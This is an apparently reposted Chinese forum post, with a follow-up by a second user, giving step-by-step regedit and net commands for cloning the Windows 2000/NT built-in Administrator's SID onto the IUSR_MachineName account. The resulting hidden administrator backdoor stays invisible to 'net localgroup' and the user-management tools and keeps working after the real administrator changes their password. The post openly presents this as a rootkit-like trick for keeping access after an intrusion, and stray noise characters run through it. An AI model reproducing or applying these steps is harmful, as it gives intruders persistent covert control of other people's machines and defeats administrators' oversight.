|
[url=] 减小字体[/url] [url=] 增大字体[/url] 经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 4 T( W) ?2 M E
; t7 ?& X, ]6 }. ]: D
首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
. D O/ l, N4 b5 b- F, q2 X4 X& k# C% E' p" c& {, }5 W
运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 - W) L6 J$ c( ]
以下是引用片段:. ] N) Q' g7 Q* k+ K
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4 ( B, L4 t ~. D% _" p
8 k- V: t& [. c- [+ y1 d- `# S这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的’1F4’修改为’3E9’后执行
2 B3 B! b! W. m+ Gregedit /s adam.reg " o& K4 L& r) z! k
导入该Reg文件 4 O- n* _- a/ Z& E
8 _( ]. g' i: e% O% F/ P2 p8 ^. o然后运行
1 y6 K W8 z! ?8 V& C; ]/ Onet user IUSR_MachineName Sometips & h5 |+ ?. n: G$ J* ]4 w" K+ o
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
% t; n0 D$ y l5 l4 V
D4 S2 p5 a9 |+ n6 EOK,大功告成... & M" T2 \. U" |$ `/ v# i% o
5 c( E+ T6 i) n: D' h这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
# o5 q9 N! P4 q而且,当我们运行 net localgroup administrators 时,看看结果:
( W8 v! V* G2 p4 i" y' D以下是引用片段:
e4 S6 g+ G; iC:/>net localgroup administrators ( B6 O7 |/ E- z8 [! O; Y
Alias name administrators 2 `2 t8 V& v- p5 p* P/ k7 x4 V
Comment Administrators have complete and unrestricted access to the computer/domain
" B* W+ Y4 e' c; K# d5 {- n# J' d5 k: T, L! ]% z
Members ! a' D) X/ A8 O/ A3 g+ P
) w' Q& f. S! V/ {4 B7 V
-------------------------------------------------------------------------------
- _/ r2 S0 D6 c% y; t4 oAdministrator 1 }* R# m Y. [+ c) n/ N9 V3 N: b
The command completed successfully.
; v, z& b% \% D+ y* {" I
% h, [& } D; H# A5 A* p4 w; T再看看USER2SID的输出结果:
7 h( o; k5 |) PC:/>user2sid Administrator
: p7 f% s8 W8 C, F( l! [7 b# D; E, ]0 C4 C, ?- I
S-1-5-21-1004336348-1078145449-854245398-500
# j U, ^" W3 d( B7 X1 W
+ e2 w& m& @( ]4 v# W1 _# U4 E2 fNumber of subauthorities is 5
$ M% J# \) z0 I7 q7 v& _: ~& K5 aDomain is IDONTKNOW & E/ {* I) F- c: N
Length of SID in memory is 28 bytes
$ w6 y+ e$ E4 J" wType of SID is SidTypeUser / t* _. W8 g3 R; x+ L' e! J
. l& @! d# U( ?. Y. b
C:/>user2sid iusr_machinename
' M0 z' [( }4 k8 ?4 r, u V5 J; o
6 P( H' y" a2 JS-1-5-21-1004336348-1078145449-854245398-1001 9 T u: Q7 V7 Z' l* ~; \1 `( d, a
9 g& j* a/ h' K
Number of subauthorities is 5
8 @6 z5 J1 G' m* gDomain is IDONTKNOW : p$ O0 S. ~2 t5 y o
Length of SID in memory is 28 bytes - _+ d( X* C- J" \1 w, K" F8 A
Type of SID is SidTypeUser
" ^, \( L M) R y: p( |. O& ^$ F% e2 {0 V. `1 V
我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)
. D& }0 t( K1 o$ _1 M: b- q
! @. C8 E* B: c. q0 m^_^,这算不算RootKit... 3 j( C6 i% S q D& C
/ D) H' }1 e5 h4 G4 A; B5 @' h
附: # Y) X7 _: ]' @
1、感谢叮叮付出需要reinstall OS的代价... " I2 {9 |0 u, G% e! U6 I" e
2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...
2 `7 y& H( M3 ^0 T4 R ?2 ?9 r0 L- S' z6 v7 {% Z$ a6 Z6 _
-----------------------------------------------------------------------------
3 m9 T9 M8 Z' @( {- _- U+ ~5 v# m0 l) _- d
叮叮 的补充完善
9 o# Z$ ]9 M5 N6 z; [# `
- t6 ?1 P" M. U y3 ]很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。
' ^1 b8 E, Y. {2 A1 I1 `& K现给出解决办法。 " N, A& u4 u0 \' y
! x9 V J4 n* o- ?9 ?) y方法同上,不过这次修改内容多一些。即 / e7 ~: Q5 I3 M% z; y+ `
这次要导出两个key内容:
4 L# o- g! y5 H6 G: [* j一个是adam提到的 3 c" d0 B+ B) z3 w, K" J
以下是引用片段:$ A. T: [3 }) r4 @4 E
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4
: y, n, d6 [; a, `3 P
1 K+ a. G* b; @, S然后另外一个是你需要修改那个账号的值 ; u3 H# x- F' U
以下是引用片段:
. _7 f: s1 [ Mregedit /e iusr.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003E9 然后按照adam提到的修改adam.reg ' Z+ S4 B8 `. |! {( c- h' p
“将adam.reg文件的第三行 以下是引用片段:1 t* p4 s( s$ c1 E: t: G
--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’ ! _; w8 v/ k+ M1 v. x
修改为IUSR_MachineName的SID”
2 f* C% R+ `) O
/ v; f) l6 P5 B! ~: u/ k- J% B现在,你还要从iusr.reg文件中复制一下内容
2 g# t* }" I' L1 C9 S1 n+ H就是将iusr.reg文件中“’V’=hex:0”开始一直到iusr.reg文件结束部分复制下来
: ^6 `/ }, m# x" ]6 q0 { k然后替换掉adam.reg中同样位置的部分
- s4 J6 C- h! f- y& K- p/ @7 s5 u s0 a& M1 b
最后使用 % q0 }+ b0 o+ e. G1 a4 J( s4 R
regedit /s adam.reg 4 O3 b: Y5 l$ c, O
导入该Reg文件
: ]- F+ Q5 e5 n+ e6 O5 {呵呵,别忘了给这个IUSR_MachineName改密码哦。
9 T+ R# R# H. c$ }! e( ?0 Mhehe,ok,大功告成。
' b" B& j! l7 U6 M6 u) O9 l现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和
5 x% A$ z0 X% K5 \. g管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。
0 r/ e, Y# G( e* S0 \都和修改前没有任何区别。 |
|